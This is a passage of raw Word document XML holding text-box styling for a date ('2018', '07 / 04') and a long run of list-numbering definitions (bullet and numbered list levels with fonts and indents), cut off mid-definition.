                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t>2018</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 7" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:46;top:2599;width:101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14:paraId="3B5C1591" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="26"/>
                            <w:szCs w:val="26"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="26"/>
                            <w:szCs w:val="26"/>
                          </w:rPr>
                          <w:t>07 / 04</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
              </v:group>
              <w10:wrap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5"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
        <w:color w:val="auto"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4400"/>
        </w:tabs>
        <w:ind w:left="4400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000008"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000008"/>
    <w:name w:val="WW8Num7"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4400"/>
        </w:tabs>
        <w:ind w:left="4400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000000C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000000C"/>
    <w:name w:val="WW8Num11"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="926"/>
        </w:tabs>
        <w:ind w:left="926" w:hanging="567"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="−"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1799"/>
        </w:tabs>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2519"/>
        </w:tabs>
        <w:ind w:left="2519" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3239"/>
        </w:tabs>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3959"/>
        </w:tabs>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4679"/>
        </w:tabs>
        <w:ind w:left="4679" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5399"/>
        </w:tabs>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6119"/>
        </w:tabs>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6839"/>
        </w:tabs>
        <w:ind w:left="6839" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000017"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000017"/>
    <w:name w:val="WW8Num22"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4400"/>
        </w:tabs>
        <w:ind w:left="4400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000001A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0000001A"/>
    <w:name w:val="WW8Num25"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1680"/>
        </w:tabs>
        <w:ind w:left="1680" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000048"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000048"/>
    <w:name w:val="WW8Num72"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="−"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4380"/>
        </w:tabs>
        <w:ind w:left="4380" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000004B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000004B"/>
    <w:name w:val="WW8Num75"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3254"/>
        </w:tabs>
        <w:ind w:left="3254" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>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cs="Times New Roman"/>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cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7560"/>
        </w:tabs>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000004C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000004C"/>
    <w:name w:val="WW8Num76"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3153"/>
        </w:tabs>
        <w:ind w:left="3153" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2433"/>
        </w:tabs>
        <w:ind w:left="2433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3153"/>
        </w:tabs>
        <w:ind w:left="3153" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3873"/>
        </w:tabs>
        <w:ind w:left="3873" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4593"/>
        </w:tabs>
        <w:ind w:left="4593" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5313"/>
        </w:tabs>
        <w:ind w:left="5313" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6033"/>
        </w:tabs>
        <w:ind w:left="6033" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6753"/>
        </w:tabs>
        <w:ind w:left="6753" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
